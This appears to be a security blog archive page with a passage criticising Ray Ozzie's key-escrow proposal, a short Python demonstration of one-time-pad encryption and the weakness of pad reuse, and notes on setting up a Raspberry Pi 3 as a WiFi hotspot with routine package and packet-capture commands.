But with Ozzie's scheme, equivalent attacks would be catastrophic, as they would lead to unlocking the phone and stealing all of somebody's secrets.

In particular, consider what would happen if LetsEncrypt's certificate were stolen (as Matthew Green points out). The consequence is that this would be detected and mass revocations would occur. If Ozzie's master key were stolen, nothing would happen. Nobody would know, and evildoers would be able to freely decrypt phones. Ozzie claims his scheme can work because SSL works -- but his scheme includes none of the many protections necessary to make SSL work.

What I'm trying to show here is that in a lab it all looks nice and pretty, but when attacked at scale, things break down -- quickly. We have so much experience with failure at scale that we can judge Ozzie's scheme as woefully incomplete. It's not even up to the standard of SSL, and we have a long list of SSL problems.

Cryptography is about people more than math

We have a mathematically pure encryption algorithm called the "One Time Pad". It can't ever be broken, provably so with mathematics.

It's also perfectly useless, as it's not something humans can use. That's why we use AES, which is vastly less secure (anything you encrypt today can probably be decrypted in 100 years). AES can be used by humans whereas One Time Pads cannot be.
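The One Time Pad mentioned above is just XOR with a truly random key as long as the message. The sketch below shows both the mathematical purity and the human failure mode: reuse the pad once and it cancels out, leaking the XOR of the two plaintexts, which is exactly the kind of mistake that breaks real systems.

```python
import os

def otp(data: bytes, pad: bytes) -> bytes:
    # One Time Pad is just XOR; encrypting and decrypting are the same
    # operation. It is provably unbreakable ONLY if the pad is truly
    # random, as long as the message, and never reused.
    assert len(pad) >= len(data)
    return bytes(d ^ p for d, p in zip(data, pad))

msg1 = b"ATTACK AT DAWN"
msg2 = b"HOLD POSITION!"
pad = os.urandom(len(msg1))

ct1 = otp(msg1, pad)
print(otp(ct1, pad) == msg1)  # True: XORing twice recovers the plaintext

# The human failure mode: reuse the pad for a second message and the
# pad cancels out, handing the attacker the XOR of the two plaintexts.
ct2 = otp(msg2, pad)
xor_of_ciphertexts = bytes(a ^ b for a, b in zip(ct1, ct2))
xor_of_plaintexts = bytes(a ^ b for a, b in zip(msg1, msg2))
print(xor_of_ciphertexts == xor_of_plaintexts)  # True: the pad is gone
```

The math is perfect; the operational requirements (key distribution, no reuse) are what humans can't sustain, which is the whole point of the argument above.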
(I learned the fallacy of One Time Pads on my grandfather's knee -- he was a WW II codebreaker who broke German messages trying to futz with One Time Pads.)

The same is true of Ozzie's scheme. It focuses on the mathematical model but ignores the human element. We already know how to solve the mathematical problem in a hundred different ways. The part we don't know how to secure is the human element.

How do we know the law enforcement person is who they say they are? How do we know the "trusted Apple employee" can't be bribed? How can the law enforcement agent communicate securely with the Apple employee?

You think these things are theoretical, but they aren't. Consider financial transactions. It used to be common that you could just email your bank/broker to wire funds into an account for such things as buying a house. Hackers have subverted that, intercepting messages, changing account numbers, …

(Published 2018-04-25, https://blog.erratasec.com/2018/04/no-ray-ozzie-hasnt-solved-crypto.html)

Errata Security - OMG The Stupid It Burns

(Published 2018-04-22, https://blog.erratasec.com/2018/04/omg-stupid-it-burns.html)

Errata Security - Notes on setting up Raspberry Pi 3 as WiFi hotspot

I got it working using the instructions here. There are a few additional notes, which is why I'm writing this blogpost, so I remember them.

https://www.raspberrypi.org/documentation/configuration/wireless/access-point.md

I'm using the RPi-3-B and not the RPi-3-B+, and the latest version of Raspbian at the time of this writing, "Raspbian Stretch Lite 2018-3-13".

Some things didn't work as described. The first is that it couldn't find the package "hostapd".
The solution was to run "apt-get update" a second time.

The second problem was an error message about NAT not working when trying to set the masquerade rule. That's because the 'upgrade' updates the kernel, making the running system out-of-date with the files on the disk. The solution to that is to make sure you reboot after upgrading.

Thus, what you do at the start is:

    apt-get update
    apt-get upgrade
    apt-get update
    shutdown -r now

Then it's just "apt-get install tcpdump" and start capturing on wlan0. This will get the non-monitor-mode Ethernet frames, which is what I want.

(Published 2018-04-16, https://blog.erratasec.com/2018/04/notes-on-setting-up-raspberry-pi-3-as.html)